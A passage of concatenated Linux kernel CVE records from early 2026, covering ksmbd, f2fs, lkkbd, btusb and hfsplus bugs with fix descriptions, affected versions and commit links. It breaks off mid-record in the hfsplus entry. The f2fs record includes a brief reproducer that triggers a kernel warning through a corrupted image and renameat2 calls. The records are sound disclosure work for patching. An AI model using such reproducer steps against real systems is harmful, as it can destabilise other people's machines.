"datePublished": "2026-01-13T15:29:15.164Z",
"dateReserved": "2025-12-24T10:30:51.045Z",
"dateUpdated": "2026-01-19T12:19:16.763Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68786 (GCVE-0-2025-68786)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-14 08:51
Title
ksmbd: skip lock-range check on equal size to avoid size==0 underflow
Summary
In the Linux kernel, the following vulnerability has been resolved:
ksmbd: skip lock-range check on equal size to avoid size==0 underflow
When size equals the current i_size (including 0), the code used to call
check_lock_range(filp, i_size, size - 1, WRITE), which computes `size - 1`
and can underflow for size==0. Skip the equal case.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: f44158485826c076335d6860d35872271a83791d , < 52fcbb92e0d3acfd1448b2a43b6595d540da5295 (git) |
| Linux | Linux | Affected: f44158485826c076335d6860d35872271a83791d , < da29cd197246c85c0473259f1cad897d9d28faea (git) |
| Linux | Linux | Affected: f44158485826c076335d6860d35872271a83791d , < a6f4cfa3783804336491e0edcb250c25f9b59d33 (git) |
| Linux | Linux | Affected: f44158485826c076335d6860d35872271a83791d , < 571204e4758a528fbd67330bd4b0dfbdafb33dd8 (git) |
| Linux | Linux | Affected: f44158485826c076335d6860d35872271a83791d , < 5d510ac31626ed157d2182149559430350cf2104 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/smb/server/vfs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "52fcbb92e0d3acfd1448b2a43b6595d540da5295",
"status": "affected",
"version": "f44158485826c076335d6860d35872271a83791d",
"versionType": "git"
},
{
"lessThan": "da29cd197246c85c0473259f1cad897d9d28faea",
"status": "affected",
"version": "f44158485826c076335d6860d35872271a83791d",
"versionType": "git"
},
{
"lessThan": "a6f4cfa3783804336491e0edcb250c25f9b59d33",
"status": "affected",
"version": "f44158485826c076335d6860d35872271a83791d",
"versionType": "git"
},
{
"lessThan": "571204e4758a528fbd67330bd4b0dfbdafb33dd8",
"status": "affected",
"version": "f44158485826c076335d6860d35872271a83791d",
"versionType": "git"
},
{
"lessThan": "5d510ac31626ed157d2182149559430350cf2104",
"status": "affected",
"version": "f44158485826c076335d6860d35872271a83791d",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/smb/server/vfs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.15"
},
{
"lessThan": "5.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "5.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: skip lock-range check on equal size to avoid size==0 underflow\n\nWhen size equals the current i_size (including 0), the code used to call\ncheck_lock_range(filp, i_size, size - 1, WRITE), which computes `size - 1`\nand can underflow for size==0. Skip the equal case."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-14T08:51:31.484Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/52fcbb92e0d3acfd1448b2a43b6595d540da5295"
},
{
"url": "https://git.kernel.org/stable/c/da29cd197246c85c0473259f1cad897d9d28faea"
},
{
"url": "https://git.kernel.org/stable/c/a6f4cfa3783804336491e0edcb250c25f9b59d33"
},
{
"url": "https://git.kernel.org/stable/c/571204e4758a528fbd67330bd4b0dfbdafb33dd8"
},
{
"url": "https://git.kernel.org/stable/c/5d510ac31626ed157d2182149559430350cf2104"
}
],
"title": "ksmbd: skip lock-range check on equal size to avoid size==0 underflow",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68786",
"datePublished": "2026-01-13T15:28:59.578Z",
"dateReserved": "2025-12-24T10:30:51.036Z",
"dateUpdated": "2026-01-14T08:51:31.484Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71069 (GCVE-0-2025-71069)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:31 – Updated: 2026-01-19 12:19
Title
f2fs: invalidate dentry cache on failed whiteout creation
Summary
In the Linux kernel, the following vulnerability has been resolved:
f2fs: invalidate dentry cache on failed whiteout creation
F2FS can mount filesystems with corrupted directory depth values that
get runtime-clamped to MAX_DIR_HASH_DEPTH. When RENAME_WHITEOUT
operations are performed on such directories, f2fs_rename performs
directory modifications (updating target entry and deleting source
entry) before attempting to add the whiteout entry via f2fs_add_link.
If f2fs_add_link fails due to the corrupted directory structure, the
function returns an error to VFS, but the partial directory
modifications have already been committed to disk. VFS assumes the
entire rename operation failed and does not update the dentry cache,
leaving stale mappings.
In the error path, VFS does not call d_move() to update the dentry
cache. This results in new_dentry still pointing to the old inode
(new_inode) which has already had its i_nlink decremented to zero.
The stale cache causes subsequent operations to incorrectly reference
the freed inode.
This causes subsequent operations to use cached dentry information that
no longer matches the on-disk state. When a second rename targets the
same entry, VFS attempts to decrement i_nlink on the stale inode, which
may already have i_nlink=0, triggering a WARNING in drop_nlink().
Example sequence:
1. First rename (RENAME_WHITEOUT): file2 → file1
   - f2fs updates file1 entry on disk (points to inode 8)
   - f2fs deletes file2 entry on disk
   - f2fs_add_link(whiteout) fails (corrupted directory)
   - Returns error to VFS
   - VFS does not call d_move() due to error
   - VFS cache still has: file1 → inode 7 (stale!)
   - inode 7 has i_nlink=0 (already decremented)
2. Second rename: file3 → file1
   - VFS uses stale cache: file1 → inode 7
   - Tries to drop_nlink on inode 7 (i_nlink already 0)
   - WARNING in drop_nlink()
Fix this by explicitly invalidating old_dentry and new_dentry when
f2fs_add_link fails during whiteout creation. This forces VFS to
refresh from disk on subsequent operations, ensuring cache consistency
even when the rename partially succeeds.
Reproducer:
1. Mount F2FS image with corrupted i_current_depth
2. renameat2(file2, file1, RENAME_WHITEOUT)
3. renameat2(file3, file1, 0)
4. System triggers WARNING in drop_nlink()
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 7e01e7ad746bc8198a8b46163ddc73a1c7d22339 , < 7f2bae0c881aa1e0a6318756df692cc13df2cc83 (git) |
| Linux | Linux | Affected: 7e01e7ad746bc8198a8b46163ddc73a1c7d22339 , < 3d95ed8cf980fdfa67a3ab9491357521ae576168 (git) |
| Linux | Linux | Affected: 7e01e7ad746bc8198a8b46163ddc73a1c7d22339 , < 64587ab4d1f16fc94f70e04fa87b2e3f69f8a7bb (git) |
| Linux | Linux | Affected: 7e01e7ad746bc8198a8b46163ddc73a1c7d22339 , < 3d65e27e57aaa9d66709fda4cbfb62a87c04a3f5 (git) |
| Linux | Linux | Affected: 7e01e7ad746bc8198a8b46163ddc73a1c7d22339 , < c89845fae250efdd59c1d4ec60e9e1c652cee4b6 (git) |
| Linux | Linux | Affected: 7e01e7ad746bc8198a8b46163ddc73a1c7d22339 , < 0dde30753c1e8648665dbe069d814e540ce2fd37 (git) |
| Linux | Linux | Affected: 7e01e7ad746bc8198a8b46163ddc73a1c7d22339 , < d33f89b34aa313f50f9a512d58dd288999f246b0 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/f2fs/namei.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "7f2bae0c881aa1e0a6318756df692cc13df2cc83",
"status": "affected",
"version": "7e01e7ad746bc8198a8b46163ddc73a1c7d22339",
"versionType": "git"
},
{
"lessThan": "3d95ed8cf980fdfa67a3ab9491357521ae576168",
"status": "affected",
"version": "7e01e7ad746bc8198a8b46163ddc73a1c7d22339",
"versionType": "git"
},
{
"lessThan": "64587ab4d1f16fc94f70e04fa87b2e3f69f8a7bb",
"status": "affected",
"version": "7e01e7ad746bc8198a8b46163ddc73a1c7d22339",
"versionType": "git"
},
{
"lessThan": "3d65e27e57aaa9d66709fda4cbfb62a87c04a3f5",
"status": "affected",
"version": "7e01e7ad746bc8198a8b46163ddc73a1c7d22339",
"versionType": "git"
},
{
"lessThan": "c89845fae250efdd59c1d4ec60e9e1c652cee4b6",
"status": "affected",
"version": "7e01e7ad746bc8198a8b46163ddc73a1c7d22339",
"versionType": "git"
},
{
"lessThan": "0dde30753c1e8648665dbe069d814e540ce2fd37",
"status": "affected",
"version": "7e01e7ad746bc8198a8b46163ddc73a1c7d22339",
"versionType": "git"
},
{
"lessThan": "d33f89b34aa313f50f9a512d58dd288999f246b0",
"status": "affected",
"version": "7e01e7ad746bc8198a8b46163ddc73a1c7d22339",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/f2fs/namei.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.2"
},
{
"lessThan": "4.2",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "4.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nf2fs: invalidate dentry cache on failed whiteout creation\n\nF2FS can mount filesystems with corrupted directory depth values that\nget runtime-clamped to MAX_DIR_HASH_DEPTH. When RENAME_WHITEOUT\noperations are performed on such directories, f2fs_rename performs\ndirectory modifications (updating target entry and deleting source\nentry) before attempting to add the whiteout entry via f2fs_add_link.\n\nIf f2fs_add_link fails due to the corrupted directory structure, the\nfunction returns an error to VFS, but the partial directory\nmodifications have already been committed to disk. VFS assumes the\nentire rename operation failed and does not update the dentry cache,\nleaving stale mappings.\n\nIn the error path, VFS does not call d_move() to update the dentry\ncache. This results in new_dentry still pointing to the old inode\n(new_inode) which has already had its i_nlink decremented to zero.\nThe stale cache causes subsequent operations to incorrectly reference\nthe freed inode.\n\nThis causes subsequent operations to use cached dentry information that\nno longer matches the on-disk state. When a second rename targets the\nsame entry, VFS attempts to decrement i_nlink on the stale inode, which\nmay already have i_nlink=0, triggering a WARNING in drop_nlink().\n\nExample sequence:\n1. First rename (RENAME_WHITEOUT): file2 \u2192 file1\n - f2fs updates file1 entry on disk (points to inode 8)\n - f2fs deletes file2 entry on disk\n - f2fs_add_link(whiteout) fails (corrupted directory)\n - Returns error to VFS\n - VFS does not call d_move() due to error\n - VFS cache still has: file1 \u2192 inode 7 (stale!)\n - inode 7 has i_nlink=0 (already decremented)\n\n2. Second rename: file3 \u2192 file1\n - VFS uses stale cache: file1 \u2192 inode 7\n - Tries to drop_nlink on inode 7 (i_nlink already 0)\n - WARNING in drop_nlink()\n\nFix this by explicitly invalidating old_dentry and new_dentry when\nf2fs_add_link fails during whiteout creation. This forces VFS to\nrefresh from disk on subsequent operations, ensuring cache consistency\neven when the rename partially succeeds.\n\nReproducer:\n1. Mount F2FS image with corrupted i_current_depth\n2. renameat2(file2, file1, RENAME_WHITEOUT)\n3. renameat2(file3, file1, 0)\n4. System triggers WARNING in drop_nlink()"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:30.946Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/7f2bae0c881aa1e0a6318756df692cc13df2cc83"
},
{
"url": "https://git.kernel.org/stable/c/3d95ed8cf980fdfa67a3ab9491357521ae576168"
},
{
"url": "https://git.kernel.org/stable/c/64587ab4d1f16fc94f70e04fa87b2e3f69f8a7bb"
},
{
"url": "https://git.kernel.org/stable/c/3d65e27e57aaa9d66709fda4cbfb62a87c04a3f5"
},
{
"url": "https://git.kernel.org/stable/c/c89845fae250efdd59c1d4ec60e9e1c652cee4b6"
},
{
"url": "https://git.kernel.org/stable/c/0dde30753c1e8648665dbe069d814e540ce2fd37"
},
{
"url": "https://git.kernel.org/stable/c/d33f89b34aa313f50f9a512d58dd288999f246b0"
}
],
"title": "f2fs: invalidate dentry cache on failed whiteout creation",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71069",
"datePublished": "2026-01-13T15:31:23.948Z",
"dateReserved": "2026-01-13T15:30:19.647Z",
"dateUpdated": "2026-01-19T12:19:30.946Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71073 (GCVE-0-2025-71073)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:31 – Updated: 2026-01-14 08:51
Title
Input: lkkbd - disable pending work before freeing device
Summary
In the Linux kernel, the following vulnerability has been resolved:
Input: lkkbd - disable pending work before freeing device
lkkbd_interrupt() schedules lk->tq via schedule_work(), and the work
handler lkkbd_reinit() dereferences the lkkbd structure and its
serio/input_dev fields.
lkkbd_disconnect() and error paths in lkkbd_connect() free the lkkbd
structure without preventing the reinit work from being queued again
until serio_close() returns. This can allow the work handler to run
after the structure has been freed, leading to a potential use-after-free.
Use disable_work_sync() instead of cancel_work_sync() to ensure the
reinit work cannot be re-queued, and call it both in lkkbd_disconnect()
and in lkkbd_connect() error paths after serio_open().
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 3a7cd1397c209076c371d53bf39a55c138f62342 (git) |
| Linux | Linux | Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < cffc4e29b1e2d44ab094cf142d7c461ff09b9104 (git) |
| Linux | Linux | Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < e58c88f0cb2d8ed89de78f6f17409d29cfab6c5c (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/input/keyboard/lkkbd.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3a7cd1397c209076c371d53bf39a55c138f62342",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "cffc4e29b1e2d44ab094cf142d7c461ff09b9104",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e58c88f0cb2d8ed89de78f6f17409d29cfab6c5c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/input/keyboard/lkkbd.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.12"
},
{
"lessThan": "2.6.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "2.6.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: lkkbd - disable pending work before freeing device\n\nlkkbd_interrupt() schedules lk-\u003etq via schedule_work(), and the work\nhandler lkkbd_reinit() dereferences the lkkbd structure and its\nserio/input_dev fields.\n\nlkkbd_disconnect() and error paths in lkkbd_connect() free the lkkbd\nstructure without preventing the reinit work from being queued again\nuntil serio_close() returns. This can allow the work handler to run\nafter the structure has been freed, leading to a potential use-after-free.\n\nUse disable_work_sync() instead of cancel_work_sync() to ensure the\nreinit work cannot be re-queued, and call it both in lkkbd_disconnect()\nand in lkkbd_connect() error paths after serio_open()."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-14T08:51:43.137Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3a7cd1397c209076c371d53bf39a55c138f62342"
},
{
"url": "https://git.kernel.org/stable/c/cffc4e29b1e2d44ab094cf142d7c461ff09b9104"
},
{
"url": "https://git.kernel.org/stable/c/e58c88f0cb2d8ed89de78f6f17409d29cfab6c5c"
}
],
"title": "Input: lkkbd - disable pending work before freeing device",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71073",
"datePublished": "2026-01-13T15:31:26.771Z",
"dateReserved": "2026-01-13T15:30:19.647Z",
"dateUpdated": "2026-01-14T08:51:43.137Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71082 (GCVE-0-2025-71082)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-19 12:19
Title
Bluetooth: btusb: revert use of devm_kzalloc in btusb
Summary
In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: btusb: revert use of devm_kzalloc in btusb
This reverts commit 98921dbd00c4e ("Bluetooth: Use devm_kzalloc in
btusb.c file").
In btusb_probe(), we use devm_kzalloc() to allocate the btusb data. This
ties the lifetime of all the btusb data to the binding of a driver to
one interface, INTF. In a driver that binds to other interfaces, ISOC
and DIAG, this is an accident waiting to happen.
The issue is revealed in btusb_disconnect(), where calling
usb_driver_release_interface(&btusb_driver, data->intf) will have devm
free the data that is also being used by the other interfaces of the
driver that may not be released yet.
To fix this, revert the use of devm and go back to freeing memory
explicitly.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 98921dbd00c4e2e4bdd56423cb5edf98d57b45f7, < fff9206b0907252a41eb12b7c1407b9347df18b1 (git) |
| Linux | Linux | Affected: 98921dbd00c4e2e4bdd56423cb5edf98d57b45f7, < cca0e9206e3bcc63cd3e72193e60149165d493cc (git) |
| Linux | Linux | Affected: 98921dbd00c4e2e4bdd56423cb5edf98d57b45f7, < c0ecb3e4451fe94f4315e6d09c4046dfbc42090b (git) |
| Linux | Linux | Affected: 98921dbd00c4e2e4bdd56423cb5edf98d57b45f7, < 1e54c19eaf84ba652c4e376571093e58e144b339 (git) |
| Linux | Linux | Affected: 98921dbd00c4e2e4bdd56423cb5edf98d57b45f7, < fdf7c640fb8a44a59b0671143d8c2f738bc48003 (git) |
| Linux | Linux | Affected: 98921dbd00c4e2e4bdd56423cb5edf98d57b45f7, < 252714f1e8bdd542025b16321c790458014d6880 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/bluetooth/btusb.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "fff9206b0907252a41eb12b7c1407b9347df18b1",
"status": "affected",
"version": "98921dbd00c4e2e4bdd56423cb5edf98d57b45f7",
"versionType": "git"
},
{
"lessThan": "cca0e9206e3bcc63cd3e72193e60149165d493cc",
"status": "affected",
"version": "98921dbd00c4e2e4bdd56423cb5edf98d57b45f7",
"versionType": "git"
},
{
"lessThan": "c0ecb3e4451fe94f4315e6d09c4046dfbc42090b",
"status": "affected",
"version": "98921dbd00c4e2e4bdd56423cb5edf98d57b45f7",
"versionType": "git"
},
{
"lessThan": "1e54c19eaf84ba652c4e376571093e58e144b339",
"status": "affected",
"version": "98921dbd00c4e2e4bdd56423cb5edf98d57b45f7",
"versionType": "git"
},
{
"lessThan": "fdf7c640fb8a44a59b0671143d8c2f738bc48003",
"status": "affected",
"version": "98921dbd00c4e2e4bdd56423cb5edf98d57b45f7",
"versionType": "git"
},
{
"lessThan": "252714f1e8bdd542025b16321c790458014d6880",
"status": "affected",
"version": "98921dbd00c4e2e4bdd56423cb5edf98d57b45f7",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/bluetooth/btusb.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.7"
},
{
"lessThan": "3.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "3.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: btusb: revert use of devm_kzalloc in btusb\n\nThis reverts commit 98921dbd00c4e (\"Bluetooth: Use devm_kzalloc in\nbtusb.c file\").\n\nIn btusb_probe(), we use devm_kzalloc() to allocate the btusb data. This\nties the lifetime of all the btusb data to the binding of a driver to\none interface, INTF. In a driver that binds to other interfaces, ISOC\nand DIAG, this is an accident waiting to happen.\n\nThe issue is revealed in btusb_disconnect(), where calling\nusb_driver_release_interface(\u0026btusb_driver, data-\u003eintf) will have devm\nfree the data that is also being used by the other interfaces of the\ndriver that may not be released yet.\n\nTo fix this, revert the use of devm and go back to freeing memory\nexplicitly."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:44.188Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/fff9206b0907252a41eb12b7c1407b9347df18b1"
},
{
"url": "https://git.kernel.org/stable/c/cca0e9206e3bcc63cd3e72193e60149165d493cc"
},
{
"url": "https://git.kernel.org/stable/c/c0ecb3e4451fe94f4315e6d09c4046dfbc42090b"
},
{
"url": "https://git.kernel.org/stable/c/1e54c19eaf84ba652c4e376571093e58e144b339"
},
{
"url": "https://git.kernel.org/stable/c/fdf7c640fb8a44a59b0671143d8c2f738bc48003"
},
{
"url": "https://git.kernel.org/stable/c/252714f1e8bdd542025b16321c790458014d6880"
}
],
"title": "Bluetooth: btusb: revert use of devm_kzalloc in btusb",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71082",
"datePublished": "2026-01-13T15:34:46.301Z",
"dateReserved": "2026-01-13T15:30:19.648Z",
"dateUpdated": "2026-01-19T12:19:44.188Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68774 (GCVE-0-2025-68774)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-19 12:18
Title
hfsplus: fix missing hfs_bnode_get() in __hfs_bnode_create
Summary
In the Linux kernel, the following vulnerability has been resolved:
hfsplus: fix missing hfs_bnode_get() in __hfs_bnode_create
When sync() and link() are called concurrently, both threads may
enter hfs_bnode_find() without finding the node in the hash table
and proceed to create it.
```
Thread A:
  hfsplus_write_inode()
    -> hfsplus_write_system_inode()
      -> hfs_btree_write()
        -> hfs_bnode_find(tree, 0)
          -> __hfs_bnode_create(tree, 0)

Thread B:
  hfsplus_create_cat()
    -> hfs_brec_insert()
